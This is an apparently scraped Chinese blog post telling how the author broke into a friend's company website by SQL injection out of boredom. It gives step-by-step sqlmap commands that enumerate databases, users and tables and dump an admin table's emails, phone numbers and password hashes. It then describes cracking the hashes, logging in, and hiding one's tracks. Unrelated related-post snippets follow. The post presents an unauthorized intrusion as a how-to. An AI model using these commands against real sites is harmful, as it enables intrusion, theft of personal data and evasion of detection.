2. 程式人生 > >我是如何一步步攻破一家網際網路公司的

我是如何一步步攻破一家網際網路公司的

阿新 發佈:2019-01-19
  本文由騰訊WeTest團隊提供,更多資訊可直接戳連結檢視:http://wetest.qq.com/lab/  微信號:TencentWeTest

最近在研究Web安全相關的知識,特別是SQL注入類的相關知識。接觸了一些與SQL注入相關的工具。週末在家閒著無聊,想把平時學的東東結合起來攻擊一下身邊某個小夥伴去的公司,看看能不能得逞。不試不知道,一試還真TM得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家網際網路公司的。

【作案工具介紹】

(1) AppScan滲透掃描工具

  AppscanWeb應用程式滲透測試舞臺上使用最廣泛的工具之一。它是一個桌面應用程式,它有助於專業安全人員進行

Web應用程式自動化脆弱性評估。

(2) Sqlmap滲透測試工具

Sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現並利用給定的URLSQL注入漏洞。

【作案細節如下】

首先使用Appscan工具,對www.xxx.com網際網路公司的官網進行掃描,掃描結果如下:

     

在這56個安全性問題中,找到你感興趣的連結,例如下面這條:

為何要挑出這一條呢?因為它對於SQL注入比較典型,下面普及下SQL注入常用手法。首先用如下語句,確定該網站是否存在注入點:

  http://192.168.16.128/news.php?id=1      原網站

  http://192.168.16.128/news.php?id=1'      出錯或顯示不正常

  http://192.168.16.128/news.php?id=1 and 1=1 出錯或顯示不正常

  http://192.168.16.128/news.php?id=1 and 1=2 出錯或顯示不正常

  如果有出錯,說明存在注入點。

1) 再次確認目標註入點是否可用:

引數:

-u:指定注入點url

結果:

注入結果展示:

a. 引數id存在基於布林的盲注,即可以根據返回頁面判斷條件真假的注入。

b. 引數id存在基於時間的盲注,即不能根據頁面返回內容判斷任何資訊,用條件語句檢視時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

c. 資料庫型別為:MySql 5.0.12

2) 暴庫所有資料庫:

一條命令即可曝出該sqlserver中所有資料庫名稱,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --dbs  

引數:

--dbsdbs前面有兩條槓,列出所有資料庫。

結果:

結果顯示該sqlserver中共包含3個可用的資料庫。

3) 獲取當前使用的資料庫

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-db

引數:

--current-db:當前所使用的資料庫。

結果:

4) 獲取當前資料庫使用賬戶

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user

5) 列出sqlserver所有使用者

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --users 

6) 獲取當前使用者資料庫賬戶與密碼

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --passwords

結果顯示該使用者可能無讀取相關係統的許可權。

7) 列出資料庫中的表

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store --tables  

引數:

-D:指定資料庫名稱

--tables:列出表

結果:

 

結果顯示共列出了69張表。

8) 列出表中欄位

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin --columns

引數:

-D:指定資料庫名稱

-T:指定要列出欄位的表

--columns:指定列出欄位

結果:

 

9)暴欄位內容

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump

引數:

-C :指定要暴的欄位

--dump:將結果匯出

如果欄位內容太多,需要花費很多時間。可以指定匯出特定範圍的欄位內容,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

引數:

--start:指定開始的行

--stop:指定結束的行

此條命令的含義為:匯出資料庫xxx_store中的表mall_admin中的關於欄位(ag_id,email,id,mobile,name,password,status)中的第1到第10行的資料內容。

結果如下:

通過上圖,我們可以看到admin表中的使用者資訊了。我們將password欄位通過md5解密,可以得到hash的原文密碼,通過使用者名稱和密碼,我們就可以登入該網站了。

至此,我們已成功入侵到一家公司的後臺,並拿到了相關的資料。不過要在這裡提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦乾淨,不讓別人發現你了!

  本文由騰訊WeTest團隊提供,更多資訊可直接戳連結檢視:http://wetest.qq.com/lab/  微信號:TencentWeTest

相關推薦

是如何步步攻破一家網際網路公司

  本文由騰訊WeTest團隊提供,更多資訊可直接戳連結檢視:http://wetest.qq.com/lab/  微信號:TencentWeTest 最近在研究Web安全相關的知識,特別是SQ

步步探尋打款系統的建立過程

1.專案背景 初始階段 業務方訂單稽核通過後,會有離線任務不斷輪訓向支付中心發起呼叫,支付中心打款處理完成後會返回ifSuccess(是否落庫),state,code,error Message等。如果落庫且code為打款成功,訂單業務狀態會修改為打款成功。 發

GIT---看步步入門(Windows Git Bash)

0 前言     不同的版本控制工具的比較這裡就不介紹了,我的入門是從windows開始的,而且是使用純命令方式(Git Bash),當然也可以結合TortoiseGit或者msysgit中的GIT

富士康是如何從大陸公司步步成為大陸企業的?

富士康據國內媒體報道,富士康旗下工業富聯公司於6月8日在上海掛牌,招股書顯示,工業富聯IPO發行股份數為19.695億股,發行價為13.77元,總共募集資金272.53億元。本次IPO衍生出了大量的話題,先是打破中國A股審批速度的最快紀錄,掛牌之後的第二個交易日又大漲44%,一躍成為A股市值最高的科技企業,此

是如何步步開發的第一個 Jenkins plugin 的

開發環境 Java 8 及以上 Maven 3.3.9 以上 複製程式碼 建立你的第一個外掛 使用示例外掛原型建立專案結構 開啟命令提示符,找到您想要儲存新 Jenkins 外掛的目錄,然後執行以下命令: $ mvn -U archetype:generate -Dfilter=io.jenkins.

新加坡本地最大區塊鏈服務商SATORI被收購!思獨角獸網際網路科技公司大手筆進軍新加坡市場

今年開始,各大想進軍區塊鏈的傳統企業越來越多,像普華永道PWC藉助資本收購了區塊鏈公司唯鏈(VeChain)的股權,北方礦業收購了全球知名幣諾數字貨幣交易平臺(Coinoah.com)100%的股權等。不管是國內還是國外,這場收購大戰正打得火熱。 無獨有偶,20

各大網際網路公司薪酬盤點!哪一家薪資最高?

前30強裡有1/3都是TMT公司,也不奇怪,因為人家給的錢也多。最近這幾年,網際網路校招的呼聲越來越高,超過了四大、快消,甚至有趕超諮詢金融之勢。今天,咱們來看看,網際網路公司的薪資水平到底怎麼樣! 華為 1、華為的級別 華為17萬人,與BAT一樣,華為是按

分享一下個人的網賺經歷 是怎麼步步走上淘客這條路的

 我現在的工作是一名淘寶客,每個月收入還算可以,要說起我自己怎麼走上淘寶客這條路的,還要從我前幾年的網賺經歷開始說起,這條路想想還是挺長的。 一開始知道這個行業是在大學暑假,當時呆在家裡,家在農村也沒有什麼兼職可以做,所以就想著能不能在網上找一份在家裡就可以做的兼職。記得當時好像

面試題()——網際網路公司面試題整理

百度移動遊戲 1.ArrayList和LinkedList區別 2.HashMap實現原理,內部構造,JDK1.8的實現 3.如何設計資料庫 4.JVM堆為什麼分成年輕代和老年代 5.ConcurrentHashMap原理 6.一個方法中定義一個in

是怎麼從客服專員,步步成為高階資料分析師

三年前,我還是在某媽網的客服專員。每天做著簡單重複的事情:打字,吃下使用者吐槽,打字,再吃一遍使用者的吐槽。機械式的重複,讓我週末跟朋友在一起都不能放開了玩。因為我知道週一我又要去面臨那低工資、機械式的工作。直到有一天,我通過觀察一個數據,幫公司確定了潛在的業務問題並且提出了

是怎麼步步用go找出壓測效能瓶頸

歡迎大家前往騰訊雲+社群,獲取更多騰訊海量技術實踐乾貨哦~ 序言: ​ 筆者要在線上伺服器load日誌並且重放來測一些機器效能指標。模擬機器資源比較少,相對的被模擬的線上機器日誌量大,假設線上單機qps有1w,那麼5臺機器組成的叢集5w個

網際網路公司的面試

距離上一次面試已經過去一年半的時間,現在這家公司雖然領導對我也還不錯(加薪2次一年半的時間哈哈),但是還是有些不滿的地方,一個是三次進行封閉式開發,拉到順義那邊,家都回不了,現在有小孩了,假如再來一次封閉,實在是不太方便,第二個當然還是薪資問題了,雖然漲了2次但是我認為還是

Julia女神告訴任何一家企業本質上都是一家軟體公司

微軟技術大會今天進入高潮,潘正磊女神發表題為“開發者在數字化轉型中的關鍵價值”的主題演講,積極評價開發者在各行業數字化轉型中扮演的關鍵角色; 女神潘正磊表示:“由技術創新引領的數字化轉型給全球各行業帶來了巨大的變革和機遇,今天的任何一家公司都必須成為軟體公司,只有駕馭數字技術才能贏得未來。開發者正在迎來最

文揭祕BAT等網際網路公司的薪酬結構

開發十年,就只剩下這套架構體系了! >>>   

貴州偏僻五線小城,竟冒出一家流水過10億的網際網路公司

開發十年,就只剩下這套架構體系了! >>>   

是這樣步步理解--主題模型(Topic Model)、LDA(案例程式碼)

1. LDA模型是什麼 LDA可以分為以下5個步驟: 一個函式:gamma函式。 四個分佈:二項分佈、多項分佈、beta分佈、Dirichlet分佈。 一個概念和一個理念:共軛先驗和貝葉斯框架。 兩個模型:pLSA、LDA。 一個取樣:Gibbs取樣 關於LDA有兩種含義,一種是線性判別分析(Linear

是如何步步的在並行程式設計中將lock鎖次數降到最低實現無鎖程式設計

在並行程式設計中,經常會遇到多執行緒間操作共享集合的問題,很多時候大家都很難逃避這個問題做到一種無鎖程式設計狀態,你也知道一旦給共享集合套上lock之後,併發和伸縮能力往往會造成很大影響,這篇就來談談如何儘可能的減少lock鎖次數甚至沒有。 一:緣由 1. 業務背景 昨天在review程式碼的時候,看到以前自

從零到千萬使用者,是如何步步優化MySQL資料庫的?

## 寫在前面 > 很多小夥伴留言說讓我寫一些工作過程中的真實案例,寫些啥呢?想來想去,寫一篇我在以前公司從零開始到使用者超千萬的資料庫架構升級演變的過程吧。 > > 本文記錄了我之前初到一家創業公司,從零開始到使用者超千萬,系統壓力暴增的情況下是如何一步步優化MySQL資料庫的,以及資料

【SSH之旅】步步學習Hibernate框架():關於持久化

stc localhost 對象 schema hbm.xml java let pass [] 在不引用不論什麽框架下,我們會通過平庸的代碼不停的對數據庫進行操作,產生了非常多冗余的可是又有規律的底層代碼,這樣頻繁的操作數據庫和大量的底層代碼的反復

步步學習EF Core(1.DBFirst)

sin then tle foreach delete tro log -h num 前言 很久沒寫博客了,因為真的很忙,終於空下來,打算學習一下EF Core順便寫個系列, 今天我們就來看看第一篇DBFirst. 本文環境:VS2017 Win7 .NET